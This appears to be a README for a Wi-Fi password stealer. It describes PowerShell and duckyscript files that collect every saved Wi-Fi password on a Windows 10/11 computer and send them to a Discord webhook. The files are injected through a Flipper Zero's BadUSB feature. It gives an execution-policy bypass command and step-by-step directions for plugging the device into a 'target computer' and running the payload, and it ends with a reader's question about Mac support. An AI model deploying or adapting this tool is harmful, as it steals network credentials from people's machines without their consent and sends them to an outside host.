This script is a wifi stealer that sends every wifi passwords stored on a Windows 10/11 computer to a discord webhook.
It is made to be used with a Flipper Zero device, using the BadUSB feature.
Wifi-Stealer-Discord.ps1
- The main script, commented for readabilityWifi-Stealer-Discord_minified.ps1
- The minified version of the script (no comments, one line)
Wifi-Stealer-Discord.txt
- A duckyscript version of the script, commented for readabilityWifi-Stealer-Discord_(Any-keyboard-layout).txt
- A duckyscript version of the script for any keyboard layout, commented for readability (for Flipper Zero)Wifi-Stealer-Discord_(One_line).txt
- A duckyscript version of the script using the minified version of the script (for Flipper Zero)
Replace https://discord.com/api/webhooks/<channel_id>/<webhook_id>
with your own webhook url.
powershell -ExecutionPolicy Bypass -File Wifi-Stealer-Discord.ps1
- Copy the .txt files to the Flipper Zero in the
badusb
folder, directly to the microSD card or using the Flipper Zero app (Android/iOS) or qFlipper (Windows/Linux/MacOS) - Plug the Flipper Zero to the target computer
- Run the script from the Flipper Zero in the
Bad USB
menu
Does this work on mac and windows?